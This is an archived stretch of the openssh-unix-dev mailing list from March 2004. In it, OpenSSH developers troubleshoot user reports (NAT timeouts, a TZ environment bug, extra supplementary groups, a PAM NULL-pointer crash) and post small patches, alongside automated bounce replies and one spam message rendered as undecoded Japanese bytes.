Mar 5 08:15:18 2004 From: djm at mindrot.org (Damien Miller) Date: Fri, 5 Mar 2004 08:15:18 +1100 (EST) Subject: -R port:host:hostport - communication lost after some minutes In-Reply-To: <20040304165612.GA14265@foo.birdnet.se> References: <20040304133036.GA6958@lebarbe.net> <20040304165612.GA14265@foo.birdnet.se> Message-ID: On Thu, 4 Mar 2004, Peter Stuge wrote: > On Thu, Mar 04, 2004 at 02:42:35PM +0100, Hans Schou wrote: > > I guess I can reproduce the bug witin 15 minutes. > > Then I'd guess your NAT firewall has a connection tracking timeout of, > exactly, 15 minutes. > > Use ClientAliveInterval in sshd to induce occasional traffic. Or ServerAliveInterval in ssh (3.8+) -d From arise-help at pry.com Fri Mar 5 08:17:10 2004 From: arise-help at pry.com (arise-help at pry.com) Date: Thu, 04 Mar 2004 21:17:10 -0000 Subject: ezmlm response Message-ID: <1078434959.7894.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. I'm sorry, I've been unable to carry out your request, since the address openssh-unix-dev at mindrot.org was not on the arise mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user at host.dom''. The unsubscribe address for this user would be: 'arise-unsubscribe-user=host.dom at pry.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 7886 invoked by alias); 4 Mar 2004 21:15:59 -0000 Delivered-To: arise-uc.1078434731.fenlpefamibgciagniel-openssh-unix-dev=mindrot.org at pry.com Received: (qmail 7873 invoked from network); 4 Mar 2004 21:15:58 -0000 Received: from unknown (HELO shitei) (203.217.30.81) by 0 with SMTP; 4 Mar 2004 21:15:58 -0000 From arise-help at pry.com Fri Mar 5 08:17:10 2004 From: arise-help at pry.com (arise-help at pry.com) Date: Thu, 04 Mar 2004 21:17:10 -0000 Subject: ezmlm response Message-ID: <1078434959.7889.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. I'm sorry, I've been unable to carry out your request, since the address openssh-unix-dev at mindrot.org was not on the arise mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user at host.dom''. The unsubscribe address for this user would be: 'arise-unsubscribe-user=host.dom at pry.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 7880 invoked by alias); 4 Mar 2004 21:15:59 -0000 Delivered-To: arise-uc.1078434731.fenlpefamibgciagniel-openssh-unix-dev=mindrot.org at pry.com Received: (qmail 7873 invoked from network); 4 Mar 2004 21:15:58 -0000 Received: from unknown (HELO shitei) (203.217.30.81) by 0 with SMTP; 4 Mar 2004 21:15:58 -0000 From dtucker at zip.com.au Fri Mar 5 09:51:53 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 05 Mar 2004 09:51:53 +1100 Subject: -R port:host:hostport - communication lost after some minutes In-Reply-To: <20040304165612.GA14265@foo.birdnet.se> References: <20040304133036.GA6958@lebarbe.net> <20040304165612.GA14265@foo.birdnet.se> Message-ID: <4047B309.1000403@zip.com.au> Peter Stuge wrote: > On Thu, Mar 04, 2004 at 02:42:35PM +0100, Hans Schou wrote: > >>>I must add that in my particular situation, joe connected to >>>"test.com" through "a lot" (at least 3) of internal networks / >>>firewalls / NAT... And that probably is the root of the problem. [...] > > Then I'd guess your NAT firewall has a connection tracking timeout of, > exactly, 15 minutes. > > Use ClientAliveInterval in sshd to induce occasional traffic. OpenSSH 3.8 also added ServerAliveInterval which can be enabled on the client side too. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Fri Mar 5 10:14:33 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 05 Mar 2004 10:14:33 +1100 Subject: SSH + Kerberos Password auth In-Reply-To: <084f01c401d5$4af2e270$230110ac@kurco> References: <084f01c401d5$4af2e270$230110ac@kurco> Message-ID: <4047B859.5030607@zip.com.au> Kumaresh wrote: > I have a question about SSH with Kerberos password authentication . > > Do I receive any host ticket to my client machine when I do ssh connection > with Kerberos password authenticaiton? If dont, why? Are you using the PAM Kerberos module for sshd, or did you configure --with-kerberos5 ? -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From djm at mindrot.org Fri Mar 5 21:13:45 2004 From: djm at mindrot.org (Damien Miller) Date: Fri, 5 Mar 2004 21:13:45 +1100 (EST) Subject: Test - please ignore Message-ID: Testing a mailing list software update. Please ignore. -d From arise-help at pry.com Sat Mar 6 00:10:20 2004 From: arise-help at pry.com (arise-help at pry.com) Date: 5 Mar 2004 13:10:20 -0000 Subject: ezmlm response Message-ID: <1078492220.24440.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. I'm sorry, I've been unable to carry out your request, since the address openssh-unix-dev at mindrot.org was not on the arise mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user at host.dom''. The unsubscribe address for this user would be: 'arise-unsubscribe-user=host.dom at pry.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 24436 invoked by alias); 5 Mar 2004 13:10:20 -0000 Delivered-To: arise-uc.1078434731.fenlpefamibgciagniel-openssh-unix-dev=mindrot.org at pry.com Received: (qmail 24432 invoked from network); 5 Mar 2004 13:10:20 -0000 Received: from unknown (HELO null.cs.brown.edu) (128.148.38.190) by 0 with SMTP; 5 Mar 2004 13:10:20 -0000 Received: from peabody (peabody [128.148.31.111]) by null.cs.brown.edu (Postfix) with ESMTP id 9289E2F021 for ; Fri, 5 Mar 2004 08:12:41 -0500 (EST) Received: from gss by peabody with local (Exim 3.36 #1 (Debian)) id 1AzF85-0007cC-00 for ; Fri, 05 Mar 2004 08:12:41 -0500 Date: Fri, 5 Mar 2004 08:12:41 -0500 From: openssh-unix-dev at mindrot.org To: arise-uc.1078434731.fenlpefamibgciagniel-openssh-unix-dev=mindrot.org at pry.com Subject: Re: confirm unsubscribe from arise at pry.com Message-ID: <20040305131241.GA28961 at cs.brown.edu> References: <1078434731.7818.ezmlm at pry.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1078434731.7818.ezmlm at pry.com> User-Agent: Mutt/1.5.4i Sender: Greg Seidman From delivery at hosyou-r.mine.nu Sat Mar 6 02:08:40 2004 From: delivery at hosyou-r.mine.nu (=?iso-2022-jp?Q?=1B=24BJ=5D=3EZ6=282q=1B=28B?=) Date: Sat, 6 Mar 2004 00:08:40 +0900 (JST) Subject: =?iso-2022-jp?b?GyRCISEhISEhTCQ+NUJ6OS05cCF2IzIyLyEiIzMyLyEiGyhC?= =?iso-2022-jp?b?GyRCIzUyLyM5QGlLfDFfPH1GfjxUJCxCMz1QJDckRiQkJF4kOSEjGyhC?= Message-ID: <8520406.1078499320558.JavaMail.root@hosyou-r.mine.nu> $B!cG[?.Z6(2qA4?.6(8\LdFAED$H?=$7$^$9!#(B $B!!!!!!!!!!!!!!BgJQ62=L$G$9$,!!G[?.Dd;_$O(B http://hosyou.versus.jp/cgi-bin/postmail/teishi.html $B$K$F$*4j$$?=$7>e$2$^$9!#!!!!!!(B *==* $B$40';"(B ==*==*====**==**==$B#52/#9 at iK|1_$X$N0lJb(B=*==*==*==*==*$B!!!!!!!!!!!!!!!!(B $B!!!!!!6`7!$N$3$H$H$*;!$7?=$7>e$2$^$9!#(B $B!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!FMA3$NG[?.!"$4MFe$2$^$9!#(B http://hosyou.versus.jp $B"#%$%^!"#5 at iK|1_$,$"$C$?$i:G9b$J$N$K!"$NJ}!9!*%$%^$+$i$G$bCY$/$"$j$^$;$s(B!! $B"##22/!"#32/!"#52/#9 at iK|1_<}F~Z5r$,$J$1$l$PC/$G$b?.MQ$7$^$;$s!#(B $B!!!!""(,(,Z5r(,(,8+$;$^$9(,(,2?;v$bO@$h$j>Z5r(,(,""(B $B!!!!!!El5~9bEy:[H==j$NH=7h=q!/!"#32/!"#52/#9 at iK|1_<}F~$N(B $B!!!!!!6d9T0uM-?69~$_=q!&J!;c;vL3=j$h$j$NJ]>Z>Z7t;HMQ0MMj=q!&B>(B $B!!(B $B""(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,(,""!!(B $B!!!!!!!!!!!!@.?MCK=w!&I{6H:_Bp9b3[%M%C%H<}F~L\E*$K:GE,$G$9!#(B $B"(!!;qNA$4 at A5a$O(B http://hosyou.versus.jp $B$+$i$*4j$$?=$7>e$2$^$9!#(B $B!!!!!!!!!!(B From TORBAN at do.usbr.gov Sat Mar 6 06:34:10 2004 From: TORBAN at do.usbr.gov (Tom Orban) Date: Fri, 05 Mar 2004 12:34:10 -0700 Subject: 3.8p1 not honoring TZ environment variable Message-ID: Hello, I just built openssh 3.8p1 on an HP-UX 11i machine. All looks well except for the timezone. I'm noticing now that when it logs stuff to syslog, it's off by 2 hours for me. What I've figured is this: My timezone is MST7MDT (mountain time). The timezone in /etc/default/tz is EST5EDT (eastern time). There's a 2 hour difference between mountain & eastern time. What I'm thinking is the real problem, is that it is not looking at the TZ environment variable to get its own setting for the timezone when it starts up, and so it just uses the default in /etc/default/tz. This behavior is definitely new to 3.8p1. I was previously running 3.7.1p2, which did not exhibit this behavior. Of course, my workaround is to change the value in /etc/default/tz, but it seems like it should be able to get the right value out of the TZ environment variable. If I'm not mistaken, sshd looks for the value of TZ with a getenv call in session.c. Not much magic there, but it doesn't seem to be working. Thanks. -Tom From postmaster at omega2.serpro.gov.br Sat Mar 6 08:13:16 2004 From: postmaster at omega2.serpro.gov.br (Mail Delivery Service) Date: Fri, 5 Mar 2004 18:13:16 -0300 Subject: Delivery Status Notification Message-ID: <4045F49A0007F143@omega2.serpro.gov.br> - These recipients of your message have been processed by the mail server: renato-costa.vieira-pinto at serpro.gov.br; Failed; 5.3.0 (other or undefined mail system status) -------------- next part -------------- An embedded message was scrubbed... From: unknown sender Subject: no subject Date: no date Size: 143 Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040305/9750bbd7/attachment.mht From djm at mindrot.org Sat Mar 6 09:25:10 2004 From: djm at mindrot.org (Damien Miller) Date: Sat, 6 Mar 2004 09:25:10 +1100 (EST) Subject: 3.8p1 not honoring TZ environment variable In-Reply-To: References: Message-ID: On Fri, 5 Mar 2004, Tom Orban wrote: > Hello, > > I just built openssh 3.8p1 on an HP-UX 11i machine. All looks well > except for the timezone. I'm noticing now that when it logs stuff to > syslog, it's off by 2 hours for me. What I've figured is this: Known problem - I believe that Darren had already committed a fix. We should be making another portable release soon for this bug and a couple of others. -d From dtucker at zip.com.au Sat Mar 6 08:39:30 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Sat, 06 Mar 2004 08:39:30 +1100 Subject: 3.8p1 not honoring TZ environment variable In-Reply-To: References: Message-ID: <4048F392.9030003@zip.com.au> Tom Orban wrote: > Hello, > > I just built openssh 3.8p1 on an HP-UX 11i machine. All looks well > except for the timezone. I'm noticing now that when it logs stuff to > syslog, it's off by 2 hours for me. What I've figured is this: > > My timezone is MST7MDT (mountain time). > The timezone in /etc/default/tz is EST5EDT (eastern time). > > There's a 2 hour difference between mountain & eastern time. > > What I'm thinking is the real problem, is that it is not looking at the > TZ environment variable to get its own setting for the timezone when it > starts up, and so it just uses the default in /etc/default/tz. This > behavior is definitely new to 3.8p1. I was previously running 3.7.1p2, > which did not exhibit this behavior. Of course, my workaround is to > change the value in /etc/default/tz, but it seems like it should be able > to get the right value out of the TZ environment variable. > > If I'm not mistaken, sshd looks for the value of TZ with a getenv call > in session.c. Not much magic there, but it doesn't seem to be working. In 3.8p1 sshd clears its environment at startup. You can disable this by deleting these lines from sshd.c: /* Clear environment */ environ[0] = NULL; That will probably be changed for the next release. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Sat Mar 6 09:42:10 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Sat, 06 Mar 2004 09:42:10 +1100 Subject: 3.8p1 not honoring TZ environment variable In-Reply-To: References: Message-ID: <40490242.1080804@zip.com.au> Damien Miller wrote: [TZ variable] > Known problem - I believe that Darren had already committed a fix. No, I haven't commited the fix yet. I'll do it in the next day or so. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Sat Mar 6 17:57:02 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Sat, 06 Mar 2004 17:57:02 +1100 Subject: [Bug 808] segfault if not using pam/keyboard-interactive mech and password's expired Message-ID: <4049763E.8090406@zip.com.au> bugzilla-daemon at mindrot.org wrote: >Summary: segfault if not using pam/keyboard-interactive mech and > password's expired I'm sorry to report that there is a bug in the PAM code in OpenSSH 3.8p1, and sorrier to say that I put it there. This is a NULL pointer dereference and is *not* considered to be a security vulnerability. When sshd is configured --with-pam, run with UsePAM=yes, and a user with an expired password successfully authenticates via a method other than keyboard-interactive without trying keyboard-interactive first, sshd will attempt to dereference a NULL pointer and segfault. In such a case, the user's session will be immediately terminated. If UsePAM=no (the default), this problem will not occur. The attached patch fixes this. Please test it, we would like to release a 3.8p2 soon containing this and a few other fixes. My apologies to anyone inconvenienced by this. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: openssh-pam-authctxt.patch Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040306/48aad78d/attachment.ksh From schulz at videotron.ca Sun Mar 7 14:10:24 2004 From: schulz at videotron.ca (Martin Schulz) Date: Sat, 06 Mar 2004 22:10:24 -0500 Subject: extra groups passed by openssh - security issue? Message-ID: <404A92A0.8030101@videotron.ca> I would appreciate your opinion on a problem with sshd on Linux, when running under daemontools supervise. The configuration: sshd version OpenSSH_3.7.1p2 Redhat Linux 2.4.20-8smp #1 SMP i686 supervise / daemontools-0.76 I see the following behavior regarding groups: -bash-2.05b$ ssh mschulz at localhost id -Gn id: cannot find name for group ID 201 id: cannot find name for group ID 2039 OA3 201 2039 The group my account belongs to is OA3, groups 201 and 2039 do not exist.. (a normal login or su, and 'id -Gn' works as expected) It turns out that when I run sshd standalone (debug), it works fine - only when run under the supervise command I see the strange extra groups. This is not related to SSH privilege separation, the install is correct and works fine with respect to the sshd privilege separation user. (I've looked through the strace output). Between different user accounts, the problem occurs often with the exact same behavior, but for some there is only one different extra group ID, or none at all. Is this a known problem? Can anyone confirm it? Looking at the source, it appears that great care is taken to _remove_ all extra groups before starting subprocesses, and indeed if I look at the exact same configuration on Solaris 8, there are no extra groups. Is this a compile option problem? I have #define HAVE_SETGROUPS 1 and everything looks proper to me. Am I looking at a bug or two? Is there a some unit testing code for the uid and privilege switching code I could run? Any simple things I should try with supervise? I am ancious to exclude any security issues related to this issue. I am relatively reluctant to 'experiment' on this box, as it is our company's main CVS server, making use of groups to control write access. Thanks a lot. Martin From dtucker at zip.com.au Sun Mar 7 18:59:39 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Sun, 07 Mar 2004 18:59:39 +1100 Subject: extra groups passed by openssh - security issue? In-Reply-To: <404A92A0.8030101@videotron.ca> References: <404A92A0.8030101@videotron.ca> Message-ID: <404AD66B.2030707@zip.com.au> Hi. I installed daemontools-0.76 and was not able to reproduce this on my box with OpenSSH 3.7.1p2 (RH9, 1 cpu, kernel 2.4.20-30.9). Martin Schulz wrote: > I would appreciate your opinion on a problem with sshd on Linux, > when running under daemontools supervise. > The configuration: > sshd version OpenSSH_3.7.1p2 > Redhat Linux 2.4.20-8smp #1 SMP i686 > supervise / daemontools-0.76 More information is needed: Did you compile OpenSSH yourself, and if so with what options? In particular, are you using PAM? What's your account database (eg do you use NIS?) Which Redhat release and have any patches been applied? What is the glibc version? What does the script starting sshd contain? > I see the following behavior regarding groups: > -bash-2.05b$ ssh mschulz at localhost id -Gn > id: cannot find name for group ID 201 > id: cannot find name for group ID 2039 > OA3 201 2039 > > The group my account belongs to is OA3, groups 201 and 2039 do not exist.. > (a normal login or su, and 'id -Gn' works as expected) What about running, eg, inetd/telnetd under daemontools? > It turns out that when I run sshd standalone (debug), it works fine - > only when run under the supervise command I see the strange extra groups. To clarify: running sshd as a stand-alone daemon (ie "sshd" with no options) *and* with debugging (ie "sshd -ddd") both work correctly? > This is not related to SSH privilege separation, the install is correct > and works fine with respect to the sshd privilege separation user. (I've > looked through the strace output). > > Between different user accounts, the problem occurs often with the exact > same behavior, > but for some there is only one different extra group ID, or none at all. You always get the same behaviour with the same accounts? What do the users exhibiting these symptoms have in common? Do those groups exist in /etc/group or the gid field of /etc/passwd? > Is this a known problem? Not that I know of. [...] -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From rouilj at cs.umb.edu Mon Mar 8 02:42:59 2004 From: rouilj at cs.umb.edu (John P. Rouillard) Date: Sun, 07 Mar 2004 10:42:59 -0500 Subject: environ problem in 3.8p1 In-Reply-To: Your message of "Wed, 03 Mar 2004 12:44:43 +1100." <4045388B.4090804@zip.com.au> Message-ID: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> In message <4045388B.4090804 at zip.com.au>, Darren Tucker writes: >Damien Miller wrote: > >> Actually, this won't work - KRB5CCNAME gets set during the auth process. >> >> Perhaps we just need to blank a couple of environment variables. Comments? > >Yes, that seems safer. I had a patch somewhere that had configure check >for unsetenv() and emulate it in openbsd-compat if not found (probably >attached to the original bug #757). Sorry if this has already been suggested, but I am only up to Tuesday in my email backlog. I would suggest not blanking "a couple of environment variables", but passing only a the environment variables you need and blanking/removing all the rest. It's just safer since you never know what variables could be used for an exploit later. -- rouilj John Rouillard =========================================================================== My employers don't acknowledge my existence much less my opinions. From Sergio.Gelato at astro.su.se Mon Mar 8 04:28:39 2004 From: Sergio.Gelato at astro.su.se (Sergio Gelato) Date: Sun, 7 Mar 2004 18:28:39 +0100 Subject: Mac OS X BROKEN_GETADDRINFO detection patch In-Reply-To: References: Message-ID: <20040307172839.GA23286@astro.su.se> * Damien Miller [2004-03-06 09:25:10 +1100]: > We should be making another portable release soon for this bug and a couple > of others. I guess I should submit the following patch now rather than later, then. Improves detection of broken getaddrinfo() on Mac OS X. Still not as comprehensive as one might wish, but detects the one extant bug I'm aware of in that platform's getaddrinfo(). Among the features broken by this bug is the ability to use non-numeric hostnames in from= clauses in the authorized_keys file. Note, however, that since getaddrinfo is in a dynamic library there is no guarantee that the version available to sshd at run time will be as bug-free as the one it was built against. It may therefore be safer to define BROKEN_GETADDRINFO unconditionally on this platform. I'd love to report the underlying issues to Apple, but the only channel I've found that might work (the feedback form didn't) involves a vaguely NDA-like piece of legalese which I have no wish to touch. If anyone else knows a better way (or has already signed that contract), let me know. --- orig/configure.ac +++ mod/configure.ac @@ -142,10 +142,19 @@ *-*-darwin*) AC_MSG_CHECKING(if we have working getaddrinfo) AC_TRY_RUN([#include -main() { if (NSVersionOfRunTimeLibrary("System") >= (60 << 16)) - exit(0); - else +#include +#include +#include +main() { + struct addrinfo hints, *ai; + if (NSVersionOfRunTimeLibrary("System") < (60 << 16)) exit(1); + memset(&hints,0,sizeof(hints)); + hints.ai_family = PF_UNSPEC; + hints.ai_flags = AI_NUMERICHOST; + if (getaddrinfo("localhost","0",&hints,&ai) != EAI_NONAME) + exit(2); + exit(0); }], [AC_MSG_RESULT(working)], [AC_MSG_RESULT(buggy) AC_DEFINE(BROKEN_GETADDRINFO)], From schulz at videotron.ca Mon Mar 8 06:08:41 2004 From: schulz at videotron.ca (Martin Schulz) Date: Sun, 07 Mar 2004 14:08:41 -0500 Subject: extra groups passed by openssh - security issue? In-Reply-To: <404AD66B.2030707@zip.com.au> References: <404A92A0.8030101@videotron.ca> <404AD66B.2030707@zip.com.au> Message-ID: <404B7339.6000902@videotron.ca> Darren, thanks for trying to rep this. See my replies below. From what you say the best option night be to 'upgrade away' these symptoms. I'll discuss trying out 3.8 and/or an upgraded Linux. Might also start trying this a variety of Linux versions. As far as we are concerned, it's only a minor anoyance. What worries me is any security implications this might have in general, however this will be limited to group level privs. Darren Tucker wrote: > Hi. > I installed daemontools-0.76 and was not able to reproduce this on > my box with OpenSSH 3.7.1p2 (RH9, 1 cpu, kernel 2.4.20-30.9). > > Martin Schulz wrote: > >> I would appreciate your opinion on a problem with sshd on Linux, >> when running under daemontools supervise. >> The configuration: >> sshd version OpenSSH_3.7.1p2 >> Redhat Linux 2.4.20-8smp #1 SMP i686 >> supervise / daemontools-0.76 > > > More information is needed: > Did you compile OpenSSH yourself, and if so with what options? Yes, ie. not me, but manually: $ ./configure --prefix=/usr/local --with-ssl-dir=/usr/local/ > > In particular, are you using PAM? Yes > What's your account database (eg do you use NIS?) files only - strace looks sensible, except that getgroups32 returns the extra groups. (aliases / publickey use NIS+ also) > Which Redhat release and have any patches been applied? I think it's RH 8, unpatched. Will check. > What is the glibc version? libc-2.3.2.so > What does the script starting sshd contain? #!/bin/bash exec /usr/local/sbin/sshd -D > > >> I see the following behavior regarding groups: >> -bash-2.05b$ ssh mschulz at localhost id -Gn >> id: cannot find name for group ID 201 >> id: cannot find name for group ID 2039 >> OA3 201 2039 > > > > >> The group my account belongs to is OA3, groups 201 and 2039 do not >> exist.. >> (a normal login or su, and 'id -Gn' works as expected) > > > What about running, eg, inetd/telnetd under daemontools? Good point, however the box is supposed to be secure, but I'll try to get that checked. What I did right now is adding a line 'id -Gn >>/tmp/sshd_supervise_id.log' to the sshd run script. Then killed sshd, and I'm getting simply 'root', not even the other groups root belongs to. Similarly, putting various id commands under 'supervise' control, did not result in any extra groups. That was unexpected, I was fully expecting the extra groups coming from 'somewhere'. I'll google for a kernel bug... I've also tried variations of invoking su, never got anything different but the real groups back. > > >> It turns out that when I run sshd standalone (debug), it works fine - >> only when run under the supervise command I see the strange extra >> groups. > > > To clarify: running sshd as a stand-alone daemon (ie "sshd" with no > options) *and* with debugging (ie "sshd -ddd") both work correctly? yes. It worked fine before put under supervise. I tried -ddd and no problem either. > > >> This is not related to SSH privilege separation, the install is >> correct and works fine with respect to the sshd privilege separation >> user. (I've > > > looked through the strace output). > >> >> Between different user accounts, the problem occurs often with the >> exact same behavior, >> but for some there is only one different extra group ID, or none at all. > > > You always get the same behaviour with the same accounts? What do the > users exhibiting these symptoms have in common? Do those groups exist > in /etc/group or the gid field of /etc/passwd? I haven't found a good pattern for that. The additional groups are 'sticky', but I'll have to restart sshd during the week to see whether that will change anything. No, these groups don't exist (if they did, we might not have noticed this in the first place!). Not in /etc/group or /etc/passwd. Furthermore several accounts get the same extra groups (201, 2039), root gets a single extra group 200. > >> Is this a known problem? > > > Not that I know of. > > [...] > Thanks again. Martin From dtucker at zip.com.au Mon Mar 8 21:41:57 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Mon, 08 Mar 2004 21:41:57 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> Message-ID: <404C4DF5.7000800@zip.com.au> John P. Rouillard wrote: > I would suggest not blanking "a couple of environment variables", but > passing only a the environment variables you need and > blanking/removing all the rest. At the moment, only specific environment variables are copied from the daemon's environment to the child's. KRB5CCNAME is an odd case because on AIX it might be set by the auth process itself, and the issue is if it's set in root's environment but not overridden during the login process. > It's just safer since you never know > what variables could be used for an exploit later. The environment variables in question are those inherited from root's environment at daemon startup, users don't get to fiddle with them. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From v_t_m at seznam.cz Tue Mar 9 06:05:50 2004 From: v_t_m at seznam.cz (=?iso-8859-2?Q?V=E1clav=20Tomec?=) Date: Mon, 08 Mar 2004 20:05:50 +0100 (CET) Subject: PATCH: scp logging Message-ID: <1288782.2680911-11373-434515956-1078772750@seznam.cz> Hello all, find attached a small patch for scp logging, I hope it might come in handy to some of you. Vaclav ____________________________________________________________ Obchodn? d?m.cz - ?irok? sortiment dom?c?ch spot?ebi?? a elektroniky, v?razn? slevy. Nav?tivte http://www.obchodni-dum.cz/index.phtml?prov=59 -------------- next part -------------- A non-text attachment was scrubbed... Name: scp_log.patch.gz Type: application/gzip Size: 1413 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040308/37cb4677/attachment.bin From schulz at videotron.ca Tue Mar 9 11:47:31 2004 From: schulz at videotron.ca (Martin Schulz) Date: Mon, 08 Mar 2004 19:47:31 -0500 Subject: extra groups passed by openssh - security issue? In-Reply-To: <404AD66B.2030707@zip.com.au> References: <404A92A0.8030101@videotron.ca> <404AD66B.2030707@zip.com.au> Message-ID: <404D1423.8000306@videotron.ca> The issue disappeared as mysteriously as it showed up. After restarting the supervise process itself we are unable to reproduce the scenario. Thanks to everyone. Darren Tucker wrote: > Hi. > I installed daemontools-0.76 and was not able to reproduce this on > my box with OpenSSH 3.7.1p2 (RH9, 1 cpu, kernel 2.4.20-30.9). > > Martin Schulz wrote: > >> I would appreciate your opinion on a problem with sshd on Linux, >> when running under daemontools supervise. >> The configuration: >> sshd version OpenSSH_3.7.1p2 >> Redhat Linux 2.4.20-8smp #1 SMP i686 >> supervise / daemontools-0.76 > > > More information is needed: > Did you compile OpenSSH yourself, and if so with what options? > In particular, are you using PAM? > What's your account database (eg do you use NIS?) > Which Redhat release and have any patches been applied? > What is the glibc version? > What does the script starting sshd contain? > >> I see the following behavior regarding groups: >> -bash-2.05b$ ssh mschulz at 